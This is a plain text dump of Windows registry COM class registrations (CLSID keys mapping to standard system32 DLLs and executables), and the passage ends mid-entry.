HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7071ECE0-663B-4bc1-A1FA-B97F3B917C55}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\connect.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7071ECE5-663B-4bc1-A1FA-B97F3B917C55}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\connect.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7071ECF1-663B-4bc1-A1FA-B97F3B917C55}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\connect.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7071ECFA-663B-4bc1-A1FA-B97F3B917C55}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\connect.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{70804ECC-7272-4dc8-AFFC-97CD66AAA282}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\mssrch.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7086AD76-44BD-11D0-81ED-00A0C90FC491}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\dmdlgs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{70A92FA3-7FD8-4808-9A05-6B2FD19AA5B3}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{70BF9CA8-182C-4BE8-8BE8-1A9217A5D1B5}\InProcHandler32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\Windows.Storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{70cba7d2-50a5-4383-8aa5-b378c01c7364}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\Windows.Storage.Search.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{711001CD-CC1D-4470-9B7E-1EF73849C79E}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\MitigationConfiguration.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\fastprox.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{713aacc8-3b71-435c-a3a1-be4e53621ab1}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71455ADC-0A77-405F-BF67-EA663D276653}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\BthMtpContextHandler.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7153AC3A-D502-4A96-83AC-32C80FA6844A}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\twinui.appcore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{715D9C59-4442-11D2-9605-00C04F8EE628}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech\Common\sapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{717ef4fe-ac8d-11d0-b945-00c04fd8d5b0}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\dsprop.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7197647A-7D2B-42E3-B6E2-9BAABBDC8B67}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\EnterpriseDesktopAppMgmtCSP.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{719ff33d-43af-4d4a-a89a-1599e6d88a37}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingSyncCore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71A5EC7F-F325-4376-9D94-622C372E256F}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\srumapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71D99464-3B6B-475C-B241-E15883207529} InfoTip REG_EXPAND_SZ @%SystemRoot%\System32\SyncCenter.dll,-6111 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71D99464-3B6B-475C-B241-E15883207529}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\SyncCenter.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71E32BAA-73EE-40a1-933C-F166F0192B72}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71f3a4a2-dc3f-4ad1-a1ad-81e2109d4414}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Win32_DeviceGuard.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71f96385-ddd6-48d3-a0c1-ae06e8b055fb}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71F96460-78F3-11d0-A18C-00A0C9118956}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\ksxbar.ax HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71F96461-78F3-11d0-A18C-00A0C9118956}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\ksxbar.ax HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71F96462-78F3-11d0-A18C-00A0C9118956}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\ksxbar.ax HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71F96463-78F3-11d0-A18C-00A0C9118956}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\ksxbar.ax HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7210D183-F81E-4CEA-A2B9-E73C4ECB067A}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\mssph.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{722b3793-5367-4446-b6bb-db89b05c1f24}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,SHCreateLocalServerRunDll {722b3793-5367-4446-b6bb-db89b05c1f24} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72422AA4-3536-41FA-965E-D5D9DD130297}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{725BE8F7-668E-4C7B-8F90-46BDB0936430} InfoTip REG_EXPAND_SZ @%SystemRoot%\System32\main.cpl,-103#immutable1 LocalizedString REG_EXPAND_SZ @%SystemRoot%\System32\main.cpl,-102#immutable1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{725BE8F7-668E-4C7B-8F90-46BDB0936430}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\main.cpl,-200 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{725BE8F7-668E-4C7B-8F90-46BDB0936430}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Control_RunDLL %SystemRoot%\System32\main.cpl,@1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{725F645B-EAED-4fc5-B1C5-D9AD0ACCBA5E}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\comdlg32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{727af81a-cacf-4e37-9df7-a22ed974f298}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72967901-68EC-11D0-B729-00AA0062CBB7}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\stdprov.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72967903-68EC-11D0-B729-00AA0062CBB7}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\stdprov.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72970BEB-81F8-46D4-B220-D743F4E49C95}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\vsswmi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72A7994A-3092-4054-B6BE-08FF81AEEFFC} LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\ntshrui.dll,-108 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72A7994A-3092-4054-B6BE-08FF81AEEFFC}\Elevation IconReference REG_EXPAND_SZ @%SystemRoot%\system32\ntshrui.dll,-116 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72A7994A-3092-4054-B6BE-08FF81AEEFFC}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shpafact.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72b36e70-8700-42d6-a7f7-c9ab3323ee51}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72B624DF-AE11-4948-A65C-351EB0829419}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecsext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72c57034-02c4-4e9f-bf9c-ca711031757e}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C97D74-7C3B-40AE-B77D-ABDB22EBA6FB} LocalizedString REG_EXPAND_SZ @%systemroot%\system32\wuapi.dll,-63517 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72d3edc2-a4c4-11d0-8533-00c04fd8d503}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\activeds.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72D633FF-401E-4AB4-BF80-143E4E907407}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72eb61e0-8672-4303-9175-f2e4c68b2e7c}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73257e95-0378-49d6-a954-44aabc841eab}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\netcorehc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{734AC5AE-68E1-4FB5-B8DA-1D92F7FC6661}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\WMIPICMP.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73843B93-848F-453B-953D-2E5B911429DC}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\audioses.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7390f3d8-0439-4c05-91e3-cf5cb290c3d0}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\mstscax.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73AD6842-ACE0-45E8-A4DD-8795881A2C2A}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech\Common\sapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73baee40-73e1-4d79-b95d-17b46be9ea08}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\exsmime.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73bf00aa-f928-4a23-b598-cd8afb33d717}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\webplatstorageserver.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73C037E7-E5D9-4954-876A-6DA81D6E5768}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\wmiprvse.exe ServerExecutable REG_EXPAND_SZ %systemroot%\system32\wbem\wmiprvse.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73EB8142-4A74-49FD-A0FC-05FAEED4CD51}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\AuditNativeSnapIn.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73FB9979-623F-41A6-BF1C-BA817C519C4F}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\audioeng.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{740e40d8-5d9f-46be-98dd-39915e3c32ef}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{74246bfc-4c96-11d0-abef-0020af6b0b7a} InfoTip REG_EXPAND_SZ @%SystemRoot%\System32\devmgr.dll,-5#immutable1 LocalizedString REG_EXPAND_SZ @%SystemRoot%\System32\devmgr.dll,-4#immutable1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{74246bfc-4c96-11d0-abef-0020af6b0b7a}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\devmgr.dll,-201 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{74246bfc-4c96-11d0-abef-0020af6b0b7a}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\devmgr.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{74246bfc-4c96-11d0-abef-0020af6b0b7a}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mmc.exe %SystemRoot%\system32\devmgmt.msc HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{74246bfc-4c96-11d0-abef-0020af6b0b7a}\Shell\RunAs\Command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mmc.exe %SystemRoot%\system32\devmgmt.msc HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{743B5D60-628D-11D2-AE0F-006097B01411}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\dpnet.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{743F1DC6-5ABA-429F-8BDF-C54D03253DC2}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\dpnet.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7444C717-39BF-11D1-8CD9-00C04FC29D45}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\cryptext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7444C719-39BF-11D1-8CD9-00C04FC29D45}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\cryptext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7447A267-0015-42C8-A8F1-FB3B94C68361}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{74628299-57EC-4F12-BA1C-08B477BF447A}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\tscfgwmi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7469AE5E-1CA1-4181-970C-BDFD8EAA2C4F}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\iassam.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{74761821-E040-423d-9399-35BBA3ECFFF5}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\daconn.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7478EF61-8C46-11d1-8D99-00A0C913CAD4}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\wdc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7478EF65-8C46-11d1-8D99-00A0C913CAD4}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\wdc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7478EF69-8C46-11d1-8D99-00A0C913CAD4}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\wdc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7487cd30-f71a-11d0-9ea7-00805f714772}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{74b077e8-32de-40ab-be4e-65609f575459}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\wdc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{75048700-EF1F-11D0-9888-006097DEACF9}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{750fdf10-2a26-11d1-a3ea-080036587f03}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\cscui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7513af53-9c75-4ad4-b47e-8d855099e023}\InProcHandler32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shcore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7519A68F-E6F1-422E-B741-F9B960CBAA97}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\FlightSettings.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{75207391-23F2-4396-85F0-8FDB879ED0ED}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\servicing\CbsApi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{752438CB-E941-433F-BCB4-8B7D2329F0C8} LocalizedString REG_EXPAND_SZ @%SystemRoot%\System32\firewallcontrolpanel.dll,-1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{752438CB-E941-433F-BCB4-8B7D2329F0C8}\Elevation IconReference REG_EXPAND_SZ @%systemroot%\system32\firewallcontrolpanel.dll,-1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{752438CB-E941-433F-BCB4-8B7D2329F0C8}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\firewallcontrolpanel.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7542E960-79C7-11D1-88F9-0080C7D771BF}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\es.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7548A939-2776-46CF-8F62-1D1F488DEDF0}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\Windows.Storage.Search.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{75587F04-6EFF-443e-BED5-637117299643}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\daconn.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{756c119d-9124-4693-80d8-2c1e49afab1f}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\rastlsext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{75718C9A-F029-11D1-A1AC-00C04FB6C223}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\wbem\wbemdisp.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{75847177-f077-4171-bd2c-a6bb2164fbd0}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7584c670-2274-4efb-b00b-d6aaba6d3850}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\mstscax.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{75CA41C9-9F1D-41BC-9285-65595759E52B}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\enterprisecsps.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{75dff2b7-6936-4c06-a8bb-676a7b00b24b}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7669CAD6-BDEC-11D1-A6A0-00C04FB9988E}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\catsrvut.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{76765b11-3f95-4af2-ac9d-ea55d8994f1a}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\propsys.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7693E886-51C9-4070-8419-9F70738EC8FA}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\mswebp.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{76A64158-CB41-11D1-8B02-00600806D9B6}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\wbem\wbemdisp.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{76be8257-c4c0-4d37-90c0-a23372254d27} LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\SearchFolder.dll,-38271 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{76be8257-c4c0-4d37-90c0-a23372254d27}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\Windows.Storage.Search.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{770e8e77-4916-441c-a9a7-b342d0eebc71}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mfcore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7724F5B4-9A4A-4a93-AD09-B06F7AB31035}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\DAMM.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7757BA9B-7986-4866-B53F-A31E89FCBA15}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\tscfgwmi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{77597368-7B15-11D0-A0C2-080036AF3F03}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\printui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7763B7C0-A5FD-4AA9-BD1B-58B17137236B}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{777B6BBD-2FF2-11D3-88FE-00C04F8EF9B5}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech\Common\sapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{777BA815-2498-4875-933A-3067DE883070} LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\xwizards.dll,-3123 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{777BA815-2498-4875-933A-3067DE883070}\Elevation IconReference REG_EXPAND_SZ @%SystemRoot%\system32\imageres.dll,-110 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{777BA815-2498-4875-933A-3067DE883070}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\xwizards.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{777BA816-2498-4875-933A-3067DE883070} LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\xwizards.dll,-3123 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{777BA816-2498-4875-933A-3067DE883070}\Elevation IconReference REG_EXPAND_SZ @%SystemRoot%\system32\imageres.dll,-110 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{777BA816-2498-4875-933A-3067DE883070}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\xwizards.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{777BA81A-2498-4875-933A-3067DE883070} LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\xwizards.dll,-3123 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{777BA81A-2498-4875-933A-3067DE883070}\Elevation IconReference REG_EXPAND_SZ @%SystemRoot%\system32\imageres.dll,-110 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{777BA81A-2498-4875-933A-3067DE883070}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shpafact.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{777BA851-2498-4875-933A-3067DE883070}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\xwtpw32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{777BA853-2498-4875-933A-3067DE883070}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\xwtpdui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{777BA87C-2498-4875-933A-3067DE883070}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\xwizards.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{777BA8D2-2498-4875-933A-3067DE883070}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\xwizards.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{777BA8E3-2498-4875-933A-3067DE883070}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\xwizards.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{777BA8E5-2498-4875-933A-3067DE883070}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\xwizards.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{777BA8E7-2498-4875-933A-3067DE883070}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\xwizards.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{777BA8E9-2498-4875-933A-3067DE883070}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\xwizards.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{777BA8F5-2498-4875-933A-3067DE883070} LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\xwizards.dll,-3123 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{777BA8F5-2498-4875-933A-3067DE883070}\Elevation IconReference REG_EXPAND_SZ @%SystemRoot%\system32\imageres.dll,-110 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{777BA8F5-2498-4875-933A-3067DE883070}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\xwreg.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{777BA8F9-2498-4875-933A-3067DE883070} LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\xwizards.dll,-3123 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{777BA8F9-2498-4875-933A-3067DE883070}\Elevation IconReference REG_EXPAND_SZ @%SystemRoot%\system32\imageres.dll,-110 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{777BA8F9-2498-4875-933A-3067DE883070}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\xwreg.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{777BA8FB-2498-4875-933A-3067DE883070} LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\xwizards.dll,-3123 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{777BA8FB-2498-4875-933A-3067DE883070}\Elevation IconReference REG_EXPAND_SZ @%SystemRoot%\system32\imageres.dll,-110 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{777BA8FB-2498-4875-933A-3067DE883070}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\xwreg.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{77A1C827-FCD2-4689-8915-9D613CC5FA3E}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\SensorsApi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{77F10CF0-3DB5-4966-B520-B7C54FD35ED6}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{77F419AA-771A-45ff-AC66-7567FA3243D3}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\ntshrui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{780102B0-C43B-4876-BC7B-5E9BA5C88794}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\StructuredQuery.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{78065982-b44b-41c6-a9a3-f2fd11746223}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\twinui.appcore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{78103FB7-AED7-4066-8BCD-30BB27B02331}\InprocServer32 (Default) 